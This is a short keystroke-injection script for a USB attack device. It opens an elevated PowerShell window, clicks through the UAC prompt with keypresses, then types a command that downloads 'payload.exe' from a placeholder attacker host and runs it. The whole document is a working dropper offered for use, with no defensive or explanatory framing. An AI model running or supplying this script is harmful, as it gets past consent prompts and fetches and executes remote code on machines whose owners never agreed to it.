GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 3000
TAB
TAB
SPACE
DELAY 500
ALT 
DELAY 3000
STRING $down = New-Object System.Net.Webclient; $url = 'http://yourip or link/payload.exe'; $file = 'payload.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
ENTER	